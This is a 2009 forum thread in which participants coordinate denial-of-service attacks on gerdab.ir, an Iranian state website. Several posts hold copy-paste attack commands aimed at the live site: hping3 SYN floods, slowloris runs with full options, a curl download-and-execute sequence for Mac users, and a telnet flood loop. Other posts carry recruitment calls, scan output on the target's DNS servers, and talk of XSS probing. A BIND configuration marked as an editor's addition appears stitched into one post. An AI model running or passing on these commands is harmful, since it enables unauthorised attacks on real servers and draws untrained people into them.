Moar Gerdab shite

Discussion in 'Help Iran Online' started by Srpska, Jul 12, 2009.

  1. Srpska Member

    OK, do we actually have any means of moving the fight against Gerdab on/up? It's been active for some time now, since it went into some kind of srs bznss lockdown mode.

    I know about the email spam, but if it's at all possible to deactivate the site itself we need to do so. I don't need to remind you of why.

    Nedasites and Slowloris are being blocked; someone mentioned that an HTTP flood might work. Any further info on this?
  2. I've been running hping3 for the past 12 hours or so in Ubuntu:

    hping3 gerdab.ir -p 80 -i u30000 -S

    This yields a steady 3.5 kib/s out and 1.9 kib/s in returning ACKs. After some fooling around with various options in pyloris and slow loris I settled on this as my best current bet, but I'm no expert. Seems like the slow loris attacks are initially potent but after a while gerdab stops acknowledging. Which would be great if it stopped responding because the server had been reduced to a smoldering heap but that's obviously not the case :)

    If anyone has better ideas or a more useful analysis, I'd be grateful to hear it.
  3. Ray Murphy Member

    I'm still waiting to hear if there is any value in reloading all the pictures, instead of just updating a minimal amount of data.
  4. Apache Server Status for gerdab.ir

    Server Version: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8b mod_perl/2.0.2 Perl/v5.8.8
    Server Built: May 28 2009 12:50:07

    Current Time: Monday, 13-Jul-2009 16:57:30 IRDT
    Restart Time: Sunday, 12-Jul-2009 04:02:36 IRDT
    Parent Server Generation: 1
    Server uptime: 1 day 12 hours 54 minutes 54 seconds
    Total accesses: 9332337 - Total Traffic: 288.4 GB
    CPU Usage: u679.32 s293.37 cu5591.92 cs0 - 4.94% CPU load
    70.2 requests/sec - 2.2 MB/second - 32.4 kB/request
    56 requests currently being processed, 78 idle workers
  5. I'm currently playing around with pygetraep, downloaded from:

    Partyvan Wiki

    Initial results are encouraging. This is a linux program, but I'm sure other bandwidth raeping tools are available in windows from the same source.

    I'll let you know if the IP banhammer comes down. I just get that feeling...
  6. They may have unlimited bandwidth

    That's all fine and dandy. Problem is that raeping is designed to exhaust bandwidth allocation allowance and thus force the site offline unless the owners pay extra to the hosting company. Gerdab has an unlimited allowance, I suspect, it's supported by the state. It's like trying to raep the White House website.
  7. That's extra time & money that isn't being spent to pay mercenaries to shoot innocent people in the face.
  8. Ray Murphy Member

    It would be interesting to see what happened if a whole bunch of people acted in unison at an agreed time.
  9. Me again, with the raeping... yeah, I'm not gonna lie -- this just boils down to me fiddling around and trying stuff and posting results because I'm running out of ways to throw my hate at these guys. :)

    I'll leave it to others to decide what's worth trying en masse. Tomorrow you might see me trying to shove a kitchen sink through the internets, who knows?
  10. Ray Murphy Member

    Is there any chance of repeatedly downloading the same images from sites? You know - by dumping them immediately after loading.
  11. Get bwraep and point it at the pages with the pics. It works well, but since I have to run it through Tor (there is a built-in button for this) it is slow. But I can get about 10-20 megs per hour.
  12. Took a couple of days, but ye olde banhammer finally came down. Ah well, time to clone a new MAC address...
  13. But with the way Iran's national network backbone is structured, what it would really be doing is to raep *everyone's* bandwidth, slowing and possibly even preventing communication with the outside world via Twitter, Facebook, etc

    BWraep may be useful for sites being hosted outside Iran (like www.irna.ir) but those sites are also large enough so that they probably have unlimited bandwidth
  14. Ray Murphy Member

    Phones can be put out of action incessantly if enough callers are involved.
  15. unskilled

    - have been running slowloris but I get the feeling that they are able to identify and block the sender. Also got the feeling that they weren't able to do that when, for a shorter period, I used a mobile connection. But this is absolutely unqualified.

    I see that you are discussing different methods. If there are some that have just a little effect, I think you should post them in enough detail for non-hackers to run them - if possible. As others have mentioned, it's important to tie up their manpower and other resources.

    Could maybe use Twitter to notify with: #gerdab
  16. Vee Member

    From watching the Apache processes before they 403'd me, I got the impression it was either only accepting a limited number of connections from each IP, or was resetting the connections faster to prevent sockets from being left open.
  17. Vee Member

    They might be blocking all IP's from outside of Iran. Would need to test from inside somehow.
  18. I am doing this

    while true; do telnet gerdab.ir 80 ; done

    it opens a connection, and after a while do it again ...

    Connected to gerdab.ir.
    Escape character is '^]'.
    HTTP/1.0 408 Request Time-out
    Cache-Control: no-cache
    Connection: close
    Content-Type: text/html

    <html><body><h1>408 Request Time-out</h1>
    Your browser didn't send a complete request in time.
    </body></html>
    Connection closed by foreign host.

    They don't block IPs from outside Iran, they are blocking all requests with "user agent" Linux or Mac, they accept just Windows.
  19. Vee Member

    It's back up here in Australia.
  20. Their DNS servers are vulnerable to spoitz.
  21. Join me to doing this

    hping3 gerdab.ir -p 80 -i u30000 -S
  22. gerdab.ir site exploitable?

    Any further information on this? Is there a way we can help?
    Does anyone know which software they're using on the gerdab.ir-site? Any known bugs in it?
  23. Apache Server Status for gerdab.ir

    Server Version: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8b mod_perl/2.0.2 Perl/v5.8.8

    ns1.sinet.ir

    DNS Server Zone Transfer Information Disclosure (AXFR)

    The remote name server allows DNS zone transfers to be performed.
    A zone transfer will allow the remote attacker to instantly populate
    a list of potential targets. In addition, companies often use a naming
    convention which can give hints as to a servers primary application
    (for instance, proxy.company.com, payroll.company.com, b2b.company.com, etc.).

    As such, this information is of great use to an attacker who may use it
    to gain information about the topology of your network and spot new
    targets.

    Solution: Restrict DNS zone transfers to only the servers that absolutely
    need it.

    Risk factor : Medium

    CVE : CVE-1999-0532
    Other references : OSVDB:492

    Nessus ID : 10595


    DNS Server Recursive Query Cache Poisoning Weakness

    Synopsis :

    The remote name server allows recursive queries to be performed
    by the host running nessusd.

    Description :

    It is possible to query the remote name server for third party
    names.

    If this is your internal nameserver, then ignore this warning.

    If you are probing a remote nameserver, then it allows anyone
    to use it to resolve third party names (such as Tenable Network Security).
    This allows attackers to perform cache poisoning attacks against
    this nameserver.

    If the host allows these recursive queries via UDP, then the
    host can be used to 'bounce' Denial of Service attacks against
    another network or system.

    See also :

    CERT Advisory CA-1997-22 BIND - the Berkeley Internet Name Daemon

    Solution :

    Restrict recursive queries to the hosts that should
    use this nameserver (such as those of the LAN connected to it).

    If you are using bind 8, you can do this by using the instruction
    'allow-recursion' in the 'options' section of your named.conf

    If you are using bind 9, you can define a grouping of internal addresses
    using the 'acl' command

    Then, within the options block, you can explicitly state:
    'allow-recursion { hosts_defined_in_acl }'

    If you are using another name server, consult its documentation.

    Risk factor :

    Medium / CVSS Base Score : 5.0
    (CVSS2#AV:N/AC:L/Au:N/C:N/I:p/A:N)

    CVE : CVE-1999-0024
    BID : 136, 678
    Other references : OSVDB:438

    Nessus ID : 10539


    DNS Server Cache Snooping Information Disclosure

    Synopsis :

    The remote DNS server is vulnerable to cache snooping attacks.

    Description :

    The remote DNS server responds to queries for third-party domains
    which do not have the recursion bit set.

    This may allow a remote attacker to determine which domains have
    recently been resolved via this name server, and therefore which hosts
    have been recently visited.

    For instance, if an attacker was interested in whether your company
    utilizes the online services of a particular financial institution,
    they would be able to use this attack to build a statistical model
    regarding company usage of that financial institution. Of course, the
    attack can also be used to find B2B partners, web-surfing patterns,
    external mail servers, and more...

    See also :

    For a much more detailed discussion of the potential risks of allowing
    DNS cache information to be queried anonymously, please see:

    http://www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf

    Risk factor :

    Medium / CVSS Base Score : 5.0
    (CVSS2#AV:N/AC:L/Au:N/C:p/I:N/A:N)

    Nessus ID : 12217
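    The three Nessus findings above all come down to the same BIND options. The following named.conf fragment is an added editor's example, not anything from the thread or from the scanned server; the ACL addresses and the zone name are placeholders to be replaced with the real ones.

    ```conf
    // BIND 9 named.conf fragment (added example; addresses and zone are placeholders)
    acl "trusted-clients" {
        localhost;
        192.0.2.0/24;        // placeholder: the LAN that should use this resolver
    };

    acl "secondary-servers" {
        198.51.100.5;        // placeholder: authorised secondary name server
    };

    options {
        directory "/var/named";

        // Nessus 10539: answer recursive queries only for trusted clients.
        allow-recursion { "trusted-clients"; };

        // Nessus 12217: outsiders must not be able to read cached entries,
        // with or without the RD bit, so restrict cache queries as well.
        allow-query-cache { "trusted-clients"; };

        // Nessus 10595: deny AXFR globally; re-enable per zone below.
        allow-transfer { none; };
    };

    zone "example.com" IN {     // placeholder zone name
        type master;
        file "example.com.zone";
        // Authoritative answers stay public; only listed secondaries may AXFR.
        allow-query { any; };
        allow-transfer { "secondary-servers"; };
        also-notify { 198.51.100.5; };
    };
    ```

    After reloading, `named-checkconf` should report nothing and a `dig @<server> example.com AXFR` from an address outside the ACL should end in "Transfer failed.", which is the check that the finding is closed.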
  24. bosnia vived

    It looks like a LAMP installation:
    Server Version: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8b mod_perl/2.0.2 Perl/v5.8.8

    It seems that there are several WWWs behind a load balancing system.

    On the Persian page there are some PHP forms, interesting for PHP hackers ...
  25. This has some progressing effects on the site:

    perl ./slowloris.pl -dns gerdab.ir -timeout 5 -num 1000 -cache

    but need more help from your side.

    Download slowloris.pl and start it please.
    Slowloris HTTP DoS
  26. I agree that it seems plausible that the page is load balanced. Hence, they might just scale out by adding further servers to be able to handle the load we're causing.

    Did some basic XSS testing on the page, but without much success, and do not have any proper vulnerability scanner available.

    If slowloris is being filtered due to the reported web agent, there is a patch which will use a randomly selected web agent identifier in the requests (unable to find URL atm). The keepalive for the site seems to be 5 secs.
  27. I don't think slowloris is being filtered out on the basis of reported web agent -- only my web browsers seem to be denied.

    Thank you. This is the best response I've gotten out of slowloris in days. Packet flow is stop & start, but never dies away for long.
  28. Ruler licenses

    We need more people doing this

    perl ./slowloris.pl -dns gerdab.ir -timeout 5 -num 1000 -cache
  29. instructions

    I would like to, but need non-hacker instructions for Mac, if possible.
  30. Srpska Member

  31. Tynex Member

    They don't block IPs from outside Iran, they are blocking all requests with "user agent" Linux or Mac, they accept just Windows

    They block Linux or Mac since their knowledge is so little about them.
    And I can bet on that they have no valid license for their Windows version, since Microsoft is not allowed to do business in Iran!

    As Microsoft says:
    " Are there certain countries you cannot ship Microsoft products to?

    Yes. In general, Microsoft products may not be exported to Cuba, Iran, North Korea, Sudan, or Syria. "

    Source is from:
    Exporting Microsoft Products

    Now I wonder, can this be in any way good for us, and bad for them??
    I think all/many Iranian government branches are using Microsoft and Cisco Systems products illegally!!
  32. Hi,
    the slowloris.pl is a Perl program requiring the Perl interpreter with the modules IO::Socket::INET, IO::Socket::SSL, and GetOpt::Long.
    To start you need first to install Perl with these modules on your system; google how to install Perl on Mac.

    Then download the Perl program, go to the command line and start it. Thanks!
  33. right?

    hi

    after having installed Xcode developer, as an experiment I typed these 4 lines in Terminal (Mac OS X):

    mkdir -p ~/Source && cd ~/Source/
    curl -O http://ha.ckers.org/slowloris/slowloris.pl
    chmod +x slowloris.pl
    ./slowloris.pl -dns gerdab.ir -timeout 5 -num 1000 -cache

    (with return at end of each line)

    and it seems to be firing, and it is clear that Perl is being recognized and interpreted. But I'm uncertain about "the modules IO::Socket::INET, IO::Socket::SSL, and GetOpt::Long".
  34. Srpska Member

    If Microsoft products cannot be exported to Iran, and the Iranian Government bans Linux and Macs, what the hell are they all using? Acorns? One of those two statements must simply be wrong.

    I would guess that the setup is something like this:

    1. Microsoft sells stuff to Iranian Government
    2. Iranian Government sells stuff to citizens, and keeps some of it for its own use
    3. Iranian Government makes some kind of deal with Microsoft that it will be the sole avenue for Microsoft's stuff in Iran
    4. Thus, Microsoft is correct to say "in general we don't ship to Iran", because the only time it will do so is when the Government has put in an order.
    5. It is also possible that the Iranian Government got the bulk of its software (and indeed hardware) before the sanctions were put in place. This would mean they would be limited to Windows 95 at best.
  35. OR

    Iran gets its software illegally. My husband could get bootleg movies as quick as I could, and he brought me a bootleg copy of Windows XP. There are sanctions and there are ways around them.
  36. Tynex Member

    I did not mean that Iran as a whole country is blocking Linux and Mac! I was supposed to quote another's message, about the "gerdab" server blocking all requests with "user agent" Linux or Mac.

    So I meant this: if Microsoft understands that gerdab is using Microsoft product(s) illegally, can they do something about gerdab?

    Anyway, Iran as a whole country is under American sanctions; this includes all American goods, also MacroSoft! And Iran is not a member of the WTO!

    This means in practice everybody can copy/hack another's work/software!
